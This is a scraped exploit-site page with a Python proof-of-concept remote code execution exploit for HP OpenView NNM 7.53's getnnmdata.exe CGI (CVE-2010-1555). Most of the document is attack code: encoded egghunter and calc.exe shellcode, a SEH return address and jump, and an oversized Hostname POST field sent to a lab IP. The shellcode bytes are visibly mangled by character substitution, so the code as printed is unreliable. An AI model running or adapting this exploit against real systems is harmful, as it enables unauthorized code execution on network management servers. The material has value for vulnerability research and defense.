HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==================================================================
HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Code Execution
==================================================================
# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid Hostname Remote Code Execution
# Date: 2010.07.02
# Author: S2 Crew [Hungary]
# Software Link: hp.com
# Version: 7.53
# Tested on: Windows 2003
# CVE: CVE-2010-1555
# Code :
#!/usr/bin/python
import struct
import socket
import httplib
import urllib
eh =(
"x50×59x49×49x49×49x49×49x49×49x49×49x51×5a"
"x56×54x58×33x30×56x58×34x41×50x30×41x33×48"
"x48×30x41×30x30×41x42×41x41×42x54×41x41×51"
"x32×41x42×32x42×42x30×42x42×58x50×38x41×43"
"x4ax4ax49×42x46×4dx51×49x5ax4bx4fx44×4fx50"
"x42×46x32×42x4ax43×32x50×58x48×4dx46×4ex47"
"x4cx43×35x50×5ax43×44x4ax4fx4fx48×50x54×46"
"x50×50x30×50x57×4cx4bx4bx4ax4ex4fx42×55x4b"
"x5ax4ex4fx44×35x4bx57×4bx4fx4dx37×41x41"
)
# calc.exe Windows Execute Command
sc2 = (
"x89xe7xdbxc4xd9×77xf4×5ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax43×43x43×43x43×43x37×52x59×6ax41"
"x58×50x30×41x30×41x6bx41×41x51×32x41×42x32×42"
"x42×30x42×42x41×42x58×50x38×41x42×75x4ax49×4b"
"x4cx4ax48×4cx49×47x70×43x30×45x50×51x70×4fx79"
"x4dx35×50x31×4bx62×43x54×4ex6bx51×42x46×50x4e"
"x6bx50×52x46×6cx4ex6bx51×42x46×74x4cx4bx43×42"
"x47×58x46×6fx4fx47×42x6ax46×46x44×71x4bx4fx44"
"x71×4fx30×4ex4cx47×4cx51×71x51×6cx46×62x44×6c"
"x45×70x4fx31×48x4fx44×4dx47×71x4ax67×4ax42×4c"
"x30×43x62×46x37×4cx4bx50×52x44×50x4cx4bx42×62"
"x45×6cx45×51x4ex30×4cx4bx47×30x50×78x4ex65×4b"
"x70×43x44×43x7ax43×31x4ax70×46x30×4ex6bx51×58"
"x42×38x4cx4bx46×38x47×50x43×31x4bx63×4bx53×47"
"x4cx42×69x4cx4bx45×64x4cx4bx45×51x4ax76×46x51"
"x4bx4fx45×61x49×50x4cx6cx4ax61×48x4fx44×4dx45"
"x51×4ax67×47x48×4bx50×44x35×4bx44×44x43×43x4d"
"x4ax58×47x4bx43×4dx51×34x51×65x4dx32×42x78×4c"
"x4bx43×68x47×54x47×71x4ax73×51x76×4cx4bx46×6c"
"x50×4bx4ex6bx42×78x45×4cx45×51x49×43x4cx4bx47"
"x74×4ex6bx47×71x4ex30×4dx59×47x34×46x44×44x64"
"x51×4bx43×6bx50×61x42×79x42×7ax50×51x49×6fx49"
"x70×43x68×51x4fx51×4ax4ex6bx45×42x4ax4bx4dx56"
"x43×6dx50×6ax47×71x4cx4dx4cx45×4ex59×45x50×45"
"x50×45x50×50x50×43x58×45x61×4ex6bx42×4fx4bx37"
"x4bx4fx4ax75×4dx6bx4cx30×4cx75×49x32×42x76×50"
"x68×4dx76×4ax35×4fx4dx4fx6dx4bx4fx49×45x47×4c"
"x43×36x51×6cx45×5ax4bx30×49x6bx4bx50×43x45×45"
"x55×4dx6bx42×67x47×63x51×62x42×4fx50×6ax45×50"
"x51×43x4bx4fx4bx65×45x33×43x51×50x6cx45×33x46"
"x4ex43×55x51×68x50×65x43×30x45×5ax41×41"
)
ret = struct.pack(‘<L’,0×5A667A77) # ppr
shortjmp = ‘x74×30x41×41′ # JZ
align = "x58"*3
asdf = (
"x2d"
"x30×65x67×66"
"x2d"
"x30×67x65×66"
"x2d"
"x30×33x33×33"
)
p = urllib.urlencode({‘SnmpLastVal’:'A’,'Topo’:'B’,'Hostname’:'A’*2038 + shortjmp + ret + "C"*50+align+asdf+"C"*36+eh+"D"*18000})
h = {"Content-Type": "application/x-www-form-urlencoded","Host":"172.16.29.149","User-Agent":"T00WT00W"+sc2}
c = httplib.HTTPConnection(‘172.16.29.149′)
c.request("POST","/OvCgi/getnnmdata.exe",p,h)
r = c.getresponse()
print r.status, r.reason
data = r.read()
print data
c.close()
print "nDonen"
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-02]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13086
Leave a Reply